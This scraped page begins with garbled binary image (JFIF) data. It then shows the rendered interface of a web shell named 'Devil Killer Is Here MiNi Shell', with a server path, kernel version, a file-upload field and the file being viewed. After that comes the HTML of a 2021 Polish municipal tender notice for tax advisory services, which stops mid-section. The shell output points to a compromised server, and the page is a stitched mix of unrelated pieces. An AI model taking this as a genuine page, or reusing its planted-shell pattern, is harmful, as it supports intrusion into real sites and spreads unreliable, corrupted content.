JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20210719/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20210719/0011899001-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00118990 z dnia 2021-07-19</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługi prawnicze polegające na doradztwie podatkowym w postępowaniach o zwrot podatku od towarów i usług oraz inne doradztwo za okres od stycznia 2020 roku do grudnia 2023 roku. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Sianów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 330920682</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Armii Polskiej 30</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sianów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">76-004</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL426 - Koszaliński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">94 34 69 543</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">jaltyn@sianow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.sianow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługi prawnicze polegające na doradztwie podatkowym w postępowaniach o zwrot podatku od towarów i usług oraz inne doradztwo za okres od stycznia 2020 roku do grudnia 2023 roku. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-aa69117a-e867-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00118990</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-19</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001719/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Usługi prawnicze polegające na doradztwie podatkowym w postępowaniach o zwrot podatku od towarów i usług oraz inne doradztwo za okres od stycznia 2020 roku do grudnia 2023 roku</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.sianow.pl https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/<br/>https://eurzad.finn.pl/gmsianow/#!/zamowienia</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Podmiotowe środki dowodowe oraz inne dokumenty lub oświadczenia, o których mowa w<br/>Rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie<br/>podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać<br/>zamawiający od wykonawcy, składa się w formie elektronicznej, w postaci elektronicznej<br/>opatrzonej podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna z art. 13 RODO w celu związanym z<br/>postępowaniem o udzielenie zamówienia publicznego zgodnie z art. 13 ust. 1 i 2 rozporządzenia<br/>Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich<br/>danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L<br/>119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: administratorem Pani/Pana danych osobowych<br/>jest Burmistrz Gminy i Miasta w Sianowie, 76-004 Sianów, ul. Armii Polskiej 30. Inspektorem ochrony 004 Sianów, ul. Armii Polskiej 30.Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust.<br/>1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego nr<br/>Z.271.7.2021 prowadzonym w trybie przetargu nieograniczonego;odbiorcami Pani/Pana danych<br/>osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o ustawę z dnia 29 stycznia 2004 r. – Prawo zamówień publicznych (Dz. U. z 2019 r. poz.<br/>2019), dalej „ustawa Pzp”; Pani/Pana dane osobowe będą przechowywane, zgodnie z ustawą Pzp,<br/>przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania<br/>umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;obowiązek<br/>podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem<br/>ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o<br/>udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy<br/>Pzp; w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;posiada Pani/Pan:na podstawie art. 15 RODO prawo<br/>dostępu do danych osobowych Pani/Pana dotyczących;na podstawie art. 16 RODO prawo do<br/>sprostowania Pani/Pana danych osobowych **;na podstawie art. 18 RODO prawo żądania od<br/>administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których<br/>mowa w art. 18 ust. 2 RODO ***; prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych<br/>Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza<br/>przepisy RODO;nie przysługuje Pani/Panu:w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do<br/>usunięcia danych osobowych;prawo do przenoszenia danych osobowych, o którym mowa w art. 20<br/>RODO;na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">Z.271.13.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 720900,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Usługi objęte zadaniem pn. „Usługi prawnicze polegające na doradztwie podatkowym w<br/>postępowaniach o zwrot podatku od towarów i usług oraz o inne doradztwo obejmujące w<br/>szczególności:a) weryfikację pozycji procesowej Zamawiającego, obejmującą przygotowanie<br/>analizy procesowej,b) zastępstwo procesowe w imieniu Zamawiającego mające na celu<br/>odzyskanie podatku od towarów i usług za okres od stycznia 2020 roku do grudnia 2023 roku.c)<br/>bieżące doradztwo podatkowe w sprawach, w zakresie których Zamawiający i jednostki<br/>organizacyjne Zamawiającego występują jako podatnik, płatnik, inkasent, doradztwo w zakresie<br/>schematów podatkowych Zamawiającego oraz czynności doradcze, w których Zamawiający<br/>występuje w charakterze organu podatkowego. 2. W ramach przedmiotu umowy Wykonawca<br/>będzie prowadził analizę zobowiązań podatkowych Zamawiającego oraz prowadził działania<br/>mające na celu odzyskanie podatku VAT.3. Ilość roboczogodzin dotyczy doradztwa<br/>podatkowego, w zakresie, w którym Zamawiający i wszystkie jednostki organizacyjne Zamawiającego występują jako podatnik, płatnik, inkasent, doradztwa w zakresie schematów<br/>podatkowych Zamawiającego oraz czynności doradcze, w których Zamawiający występuje w<br/>charakterze organu podatkowego. 4. Godziny świadczenia usług określone umową nie obejmują<br/>czynności związanych z odzyskiwaniem podatku VAT, za które Wykonawca zapłaci procentem<br/>odzyskanej kwoty.5. W celu realizacji usług objętych niniejszą umową Zamawiający udzieli<br/>radcy prawnemu wskazanemu przez Wykonawcę pełnomocnictwa do reprezentowania<br/>Zamawiającego przed organami podatkowymi i sądami administracyjnymi oraz Trybunałem<br/>Sprawiedliwości Unii Europejskiej.Szczegółowy opis przedmiotu zamówienia został zawarty w<br/>projekcie umowy – załącznik do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79220000-2 - Usługi podatkowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Cenę oferty stanowi oferowany % Nadpłaty.<br/>2.	Wykonawca w formularzu oferty stanowiącym Załącznik nr 1 do SWZ podaje % oferowanej Nadpłaty, przy czym jako „% Nadpłaty" należy rozumieć procent z tytułu kwoty zwrotu podatku naliczonego, zwrotu nadwyżki podatku naliczonego nad należnym oraz zwrotu nadpłaty, niezależnie czy te zwroty zostaną zrealizowane na rachunek bankowy Zamawiającego, czy też nastąpi zaliczenie ww. kwot na poczet zaległości podatkowych albo bieżących, albo przyszłych zobowiązań podatkowych Zamawiającego bądź jego jednostek organizacyjnych, w tym na poczet odsetek.<br/>3.	„% Nadpłaty” obejmuje również procent z tytułu odsetek od kwoty zwrotu podatku naliczonego, zwrotu nadwyżki podatku naliczonego nad należnym oraz zwrotu nadpłaty. <br/>4.	Dla potrzeb kalkulacji oferty i określenia „% Nadpłaty” Wykonawcy powinni uwzględnić dane wskazane w Opisie Przedmiotu Zamówienia oraz Istotnych postanowieniach umowy.<br/>5.	Zamawiający dokona w celu porównania ofert przeliczenia oferowanego „% Nadpłaty” w oparciu o zakładany do odzyskania VAT w wysokości 4 806 000,00 PLN (słownie: cztery miliony osiemset sześć złotych 00/100).<br/>6.	Wynagrodzenie Wykonawcy, tj. procent odzyskanej nadpłaty pomniejszone zostanie:<br/>a)	o kwotę 1.000,00 PLN netto (słownie: jeden tysiąc złotych 00/100) z tytułu przeprowadzenia fazy diagnostycznej,<br/>b)	o kwotę wynagrodzenia za zastępstwo procesowe należną Wykonawcy w ramach postępowań sądowych.<br/>7.	Wykonawca nie ponosi kosztów opłat sądowych oraz opłat za wnioski o interpretację przepisów prawa podatkowego.<br/>8.	Nie można zaoferować 0% (oferty z wynagrodzeniem 0% zostaną odrzucone).<br/>9.	Rozliczenia pomiędzy Zamawiającym a Wykonawcą będą prowadzone w walucie PLN.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Potencjał kadrowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koncepcja realizacji zamówienia w zakresie odzyskiwania podatku VAT (KRZ)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50,00</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Liczba oferowanych godzin</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Sytuacja ekonomiczna lub finansowa:<br/>Warunek zostanie uznany za spełniony jeżeli wykonawca wykaże, iż posiada aktualne ubezpieczenie od odpowiedzialności cywilnej w zakresie doradztwa podatkowego, na sumę ubezpieczeniową nie mniejszą niż 1.000.000,- PLN (słownie: jeden milion złotych 00/100). <br/>W przypadku wykazania się posiadaniem ubezpieczenia od odpowiedzialności cywilnej, określającym sumę ubezpieczeniową w innej walucie niż PLN, przeliczenie tych wartości nastąpi po średnim kursie ogłoszonym przez NBP w dniu opublikowania ogłoszenia o niniejszym zamówieniu w Biuletynie Zamówień Publicznych. W przypadku gdy w tym dniu, NBP nie opublikuje tabeli kursów średnich, Zamawiający przyjmie jako podstawę kurs z tabeli kursów średnich opublikowanych w dniu najbliższym po dniu publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych. <br/>2. Zdolność techniczna lub zawodowa:<br/>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że wykonał (a w przypadku świadczeń okresowych lub ciągłych również wykonuje) należycie w okresie ostatnich trzech (3) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.<br/>a)	co najmniej trzy (3) postępowania dla jednostek samorządu terytorialnego, w tym co najmniej dla jednej (1) gminy miejskiej, zakończone odzyskaniem podatku VAT o łącznej wartości nie mniejszej niż 2 500 000,- PLN (słownie: dwa miliony pięćset złotych 00/100),<br/>b)	co najmniej dwuletnie doświadczenie w zakresie identyfikacji i raportowania schematów podatkowych (MDR).<br/><br/>Zamawiający dopuszcza możliwość łączenia w jednym zamówieniu, realizowanym w ramach jednej umowy usług wymienionych powyżej.<br/>3. W zakresie dysponowania osobami do realizacji zamówienia: <br/>Wykonawca spełni warunek jeżeli wykaże, że dysponuje lub będzie dysponował na potrzeby realizacji zamówienia co najmniej czterema (4) osobami posiadającymi uprawnienia do wykonywania usług doradztwa podatkowego, zgodnie z art. 3 ust. 2 ustawy z dnia 5 lipca 1996 roku o doradztwie podatkowym (t.j. Dz. U. z 2020 r. poz. 130 ze zm.).<br/>Warunek zostanie uznany za spełniony tylko w przypadku, gdy każda z wymienionych osób jest wpisana na listę doradców podatkowych lub radców prawnych lub adwokatów oraz posiada czynne prawo do wykonywania zawodu (wykonuje zawód). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)	Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2019 r. poz. 369), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 4 do SWZ;<br/>2)	Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.<br/>W przypadku składania oferty przez wspólników spółki cywilnej dokumenty wymienione w pkt 1 muszą być złożone oddzielnie dla każdego ze wspólników oraz dla spółki cywilnej.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu wstępnego potwierdzenia spełnienia warunków, o których mowa<br/>w rozdziale II PKT.1 i 2 SWZ wraz z ofertą Wykonawca złoży następujące dokumenty: - aktualne na<br/>dzień składania ofert oświadczenia, że nie podlega wykluczeniu oraz spełnia warunki udziału w<br/>postępowaniu sporządzone na/wg załącznika nr 2 i 3.<br/>2) Oświadczenia, o którym mowa w pkt 1<br/>stanowią dowód potwierdzający brak podstaw wykluczenia, spełnienie warunków udziału w<br/>postępowaniu, odpowiednio na dzień składania ofert, stanowią dowód tymczasowo zastępujący<br/>wymagane przez zamawiającego podmiotowe środki dowodowe.3) W przypadku wspólnego ubiegania<br/>się o zamówienie przez wykonawców, oświadczenia o których mowa w pkt 1 składa każdy z<br/>wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te mają potwierdzać spełnienie<br/>warunków w postępowaniu, brak podstaw wykluczenia w zakresie, w jakim każdy z wykonawców<br/>wykazuje spełnianie warunków udziału w postępowaniu , brak podstaw do wykluczenia.4) Wykonawca,<br/>który powołuje się na zasoby innych podmiotów, przedstawia, wraz z oświadczeniami o których mowa<br/>w ust. 3, także oświadczenia podmiotu udostępniającego zasoby, potwierdzające brak podstaw<br/>wykluczenia tego podmiotu oraz odpowiednio spełnienie warunków udziału w postępowaniu w<br/>zakresie, w jakim wykonawca powołuje się na jego zasoby.5) Pełnomocnictwo ( jeżeli umocowanie<br/>osoby podpisującej złożoną ofertę nie wynika z dokumentów rejestrowych),6) Pełnomocnictwa dla<br/>lidera konsorcjum ( jeżeli oferta składana przez Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia),7) Zobowiązanie podmiotu trzeciego do udostępnienia zasobów lub inny dokument<br/>potwierdzający, że Wykonawca będzie dysponował niezbędnymi zasobami podmiotu trzeciego ( jeżeli<br/>dotyczy),8) Koncepcja Realizacji Zamówienia ( KRZ),9) Wykaz osób niezbędny do dokonania oceny<br/>wg kryterium nr 2 - ,,Potencjał kadrowy” wg załącznika nr 7 do SWZ,</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawca, który ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentu wymienionego w pkt. B niniejszej SWZ składa:<br/>1) dokument, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. <br/>Informacja i dokument o którym mowa w pkt.1 powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert .<br/>Pozostałe oświadczenia/dokumenty wymagane w prowadzonym postępowaniu, Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, składa takie same jak Wykonawca polski. <br/>Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania (z zachowaniem terminu odpowiednio 3 miesiące przed terminem składania ofert).<br/>Wszystkie dokumenty sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski. <h2 class="bg-light p-3 mt-4">SEKCJA VI - 